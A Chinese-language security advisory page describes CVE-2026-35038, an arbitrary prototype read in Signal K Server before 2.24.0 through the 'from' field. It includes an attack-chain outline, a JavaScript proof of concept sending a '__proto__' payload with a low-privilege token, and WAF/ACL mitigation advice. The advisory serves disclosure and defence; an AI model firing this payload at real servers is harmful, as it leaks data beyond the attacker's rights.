CVE-2026-35038 CVSS 6.5 中危

CVE-2026-35038 Signal K Server 任意原型读取漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35038

漏洞类型

原型污染

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Signal K Server

漏洞概述

Signal K Server是一款运行在船只中心集线器上的服务器应用程序。在2.24.0版本之前，该系统存在一处通过`from`字段绕过的任意原型读取漏洞。低权限的已认证用户利用此漏洞可以绕过原型边界过滤机制，成功从全局原型对象中提取内部函数和属性。这一问题严重违反了数据隔离原则，使得攻击者能够读取超出其权限范围的数据。目前该问题已在2.24.0版本中得到修复。

技术细节

该漏洞的核心在于Signal K Server对用户输入中`from`字段的处理逻辑存在缺陷，未能有效实施原型边界过滤。攻击者利用低权限账户发送特制请求，通过精心构造的Payload绕过安全检查机制，实现对全局原型对象的任意读取。在JavaScript引擎中，对象继承自Object.prototype，攻击者利用这一特性，可以访问并提取原本不应暴露的内部函数、属性或敏感配置信息。这种原型读取漏洞严重破坏了应用的数据隔离模型。尽管该漏洞主要表现为信息泄露，未直接修改原型链导致代码执行，但泄露的内部逻辑可能为进一步的攻击提供关键辅助。该攻击利用网络向量，无需用户交互即可触发。

攻击链分析

STEP 1

侦察

攻击者识别目标网络上运行Signal K Server的服务，并确认其版本低于2.24.0。

STEP 2

获取凭证

攻击者获取或注册一个低权限账户，获取有效的身份验证令牌（Bearer Token）。

STEP 3

发送恶意请求

攻击者利用认证令牌，向服务器API发送特制的HTTP请求，其中包含试图访问原型属性的`from`字段。

STEP 4

信息泄露

服务器未能过滤恶意请求，处理`from`字段时从全局原型对象中读取数据，并将内部函数或属性返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-35038
// Target: Signal K Server < 2.24.0
// Description: Arbitrary prototype read via 'from' field bypass

// The vulnerability allows reading from the global prototype.
// An attacker with low privileges sends a request with a crafted 'from' field.

const fetch = require('node-fetch');

async function exploit() {
    const targetUrl = 'http://target-signalk-server:3000/signalk/v1/stream';
    const authToken = 'LOW_PRIVILEGE_TOKEN_HERE'; // Requires valid low-priv token

    // Malicious payload attempting to read from Object.prototype
    const payload = {
        "context": "vessels.self",
        "subscribe": [
            {
                "path": "navigation",
                "period": 1000
            }
        ],
        // The 'from' field is the vector that bypasses filtering
        "from": "__proto__.pollutedProperty" 
    };

    try {
        const response = await fetch(targetUrl, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
                'Authorization': `Bearer ${authToken}`
            },
            body: JSON.stringify(payload)
        });

        const data = await response.text();
        console.log('Response:', data);
        // If successful, the response may contain properties leaked from the prototype chain.
    } catch (error) {
        console.error('Exploit failed:', error);
    }
}

exploit();

影响范围

Signal K Server < 2.24.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议实施网络访问控制列表（ACL）以限制对Signal K Server API的访问。此外，部署Web应用防火墙（WAF）规则，检测并拦截包含异常`from`字段值（如`__proto__`、`constructor`等）的请求，以缓解潜在的探测和利用尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表